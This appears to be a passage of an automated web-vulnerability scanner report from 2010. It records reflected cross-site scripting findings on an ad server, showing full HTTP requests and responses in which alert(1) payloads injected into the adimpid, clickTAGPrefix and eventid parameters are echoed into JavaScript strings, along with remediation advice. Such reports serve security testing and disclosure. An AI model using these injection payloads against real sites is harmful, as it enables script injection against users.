GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a72924b4b"-alert(1)-"3c253612db8&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6996 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:16 GMT Expires: Fri, 26 Nov 2010 20:48:16 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... .net/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a72924b4b"-alert(1)-"3c253612db8&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/loyalty/immediate-rewards.aspx?&code=9903600308"); var fscUrl = url;
The value of the adimpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb913"-alert(1)-"e8a2d1bf494 was submitted in the adimpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Vabb913"-alert(1)-"e8a2d1bf494&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:11 GMT Expires: Fri, 26 Nov 2010 20:47:11 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... 728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Vabb913"-alert(1)-"e8a2d1bf494&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3 ...[SNIP]...
The value of the adimpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d8ee'-alert(1)-'93cfb988593 was submitted in the adimpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va6d8ee'-alert(1)-'93cfb988593&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:11 GMT Expires: Fri, 26 Nov 2010 20:47:11 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... 728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va6d8ee'-alert(1)-'93cfb988593&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3 ...[SNIP]...
The value of the clickTAGPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a78e"-alert(1)-"37bc81f05c0 was submitted in the clickTAGPrefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4a78e"-alert(1)-"37bc81f05c0&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:13 GMT Expires: Fri, 26 Nov 2010 20:47:13 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... %5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4a78e"-alert(1)-"37bc81f05c0&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl="; var dcadvurl = escape(advurl); var dcminversion = 9; var dccreativewidth = "728"; var dccreativeheight = "90"; var dcwmode = "opaque"; var dcbgcolor = "" ...[SNIP]...
The value of the clickTAGPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b738'-alert(1)-'0c2a0e4571f was submitted in the clickTAGPrefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4b738'-alert(1)-'0c2a0e4571f&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:14 GMT Expires: Fri, 26 Nov 2010 20:47:14 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... %5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4b738'-alert(1)-'0c2a0e4571f&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=http%3a%2f%2fwww.overstock.com"> ...[SNIP]...
The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a2c2'-alert(1)-'59698adec3d was submitted in the eventid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=100014a2c2'-alert(1)-'59698adec3d&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:04 GMT Expires: Fri, 26 Nov 2010 20:47:04 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=100014a2c2'-alert(1)-'59698adec3d&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D154094 ...[SNIP]...
The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93076"-alert(1)-"08bdf57445f was submitted in the eventid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=1000193076"-alert(1)-"08bdf57445f&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 